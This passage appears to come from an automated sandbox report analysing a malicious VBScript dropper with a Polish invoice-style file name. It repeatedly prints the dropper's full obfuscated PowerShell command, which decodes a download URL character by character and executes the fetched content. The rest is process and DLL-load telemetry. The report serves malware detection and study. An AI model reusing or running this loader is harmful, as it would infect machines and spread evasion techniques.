      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssJump to behavior
      Source: MPOL_74836582 Zapytanie Potwierdzenie 003424.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6250
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6250Jump to behavior
      Source: classification engineClassification label: mal88.troj.expl.evad.winVBS@9/3@17/0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Arkaiserings.SlgJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa2gxs0x.djv.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\MPOL_74836582 Zapytanie Potwierdzenie 003424.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677e
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677e
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping aszzzw_6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydssJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping aszzzw_6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: m.Core.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb@c source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CCD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ows\dll\System.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4CFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: *n.pdb source: powershell.exe, 0000000B.00000002.2571264131.000002A2C4D29000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbN source: powershell.exe, 0000000B.00000002.2594834506.000002A2DD294000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.2570430275.000002A2C3142000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      VBScript performs obfuscated calls to suspicious functions
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegr", "0")
      Suspicious powershell command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr ';$Croises=Jus ' ,kr>Nerv ';$Andantinoer=Jus ' ResIAnamESo iXViva ';$Befogging='Italiana';$Recarbon='\Arkaiserings.Slg';Hyperromanticism140 (Jus 'Forh$ empgPr,clAg eofrueBOms.AM.nolOver:NiveA pidnVagta ispCThyrl DisiFrihsSegriOu,dsKnu,1Vrkb4E gl7,arv=A ab$ s eE.uniNCog VAnt :Ae iaForfpTeraPKer dNoncaConttWienAluge+Arv,$,ambrStteeExcuc issAkontr S,kb MayoWeasNStub ');Hyperromanticism140 (Jus ' hec$DefeG Ln Lr ckONonaB ForaTe.eLBrn :GenoAGrafuAlleT MulOSa.se Co.T SvrtRuboE Bra= P s$UnsoM ShaiEme.LStyrjNulsfAarro M,mrdoryASyndn InbDAnlirSpe,iNasaN KomG VodeyustRInflS Spy.Sprjs xaP SmrlVa dIBisetSub (Well$ PeacJeweRRetso S,di NitsEsseEUpshsSydv)Arb ');Hyperromanticism140 (Jus 'Ndp [Cyc n.ndiEOothT S,j.Ger.sskovEUd frRespvProhI U fCfedteSalvPPhylOSan.i Op.nS.orT antmSpilaFjolN lauaR liGUprue ChoRTuli]W nn:t.ed:Ansts heeBageCisskU MyorHeltI rustUrotyUdviPSc dr.ygaOUndstOro.O CryC idO talLHove Da a=Steg Kaff[H moNBesgETutotBird. ebySGerfEUni CSweauDyserOverIHomoT Picy,efrpLnkorUdstoMaantBiltORomaCafs.oC holCondTKavey KolPRdtue S,e]Tui :Hypo:smalTamucLKo ps N n1Nond2 Dep ');$Miljforandringers=$Autoette[0];$Panspermic=(Jus 'R od$Trepg alaLU.caoElecBEuryaGsteLFisk:spidTBstrEKloasGruntHikkUBeelD FesSUdskKC ieRUdp iSv.jvUalmN Madi CebnStruGPoinSW.ntf TraAfredcVindI mpelgr nIO det Unoe PretMeine.urunAmph=UzbenneoneBolsWSlen- AtmOmaliBCaatjSekaeKr mcAartTDimi .eadS ilYBlabSAfstTAsseeYallM Vrd.TripN Chee Sert ask.assuwTrameWoo.bFodecO chlPeroISp aeUd,anVasotThie ');Hyperromanticism140 ($Panspermic);Hyperromanticism140 (Jus 'Terp$NeksT Gr,eLydss
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svigagtige dimerised Oprettelsesdokumenter Rhinodynia Zetas #>;$Desiringly147='Grunted';<#Iltelegrammet Hemispheral Acromelalgia Deboshed Corruptibleness #>;$Masonically=$Nervepatientens+$host.UI;If ($Masonically) {$Laengst++;}function Jus($Hovekatalogers){$Saneringsmodent=$Skrmplante+$Hovekatalogers.'Length'-$Laengst; for( $Isttes=4;$Isttes -lt $Saneringsmodent;$Isttes+=5){$Skovsvinerier++;$Snrer210+=$Hovekatalogers[$Isttes];$Skuebrdene='Kundemdets';}$Snrer210;}function Hyperromanticism140($Regelfaststtelsers){ & ($Andantinoer) ($Regelfaststtelsers);}$Courtezanry=Jus ' owlMBov.o Unlz R niFluslDiasl AnoaDay /Non. ';$Courtezanry+=Jus ' ad5Thro. Ska0 Adr Dece(Is.aWRotaiInvanRad.dBracoGawaw M,rsFren Ch,pNOndsT,til Rose1Skr,0Ungd. B t0Ig,i;Str ParWNoneiTra nFar,6Krem4S,je; Ber Mot x Ka.6S,at4Ha,l;Cykl BaghrAfstv itr: Hol1 All3 it1 or.Fugl0 ava)Stri FyriGStegeGenocOmgakIgnao rre/As p2Depr0 Mis1calc0 Spo0Penk1side0 Enf1Retr WeapFPropiLaserRemoe,kolfLiv,oBarbxBlu /Unf.1Pol,3 Unf1utrn. mb0Bade ';$Retspraksisens=Jus 'KariU,rivsPhyteLet.rtana-Unfra StygSmmeeBorgNTil TBlac ';$Miljforandringers=Jus 'LegahUnivtenketKloapStats boo:Recu/Ergo/gae,gsolboHyd vFolkaHumel RatlMahocFati.SerpoPaasrPitagBibe/R gnrBegae ird DefnSta iSamfnTo lgEners IndbF rsl.tatt .ydeTr lr idtnM,dheCervs oma.Sou.aAsylsCan iOstr 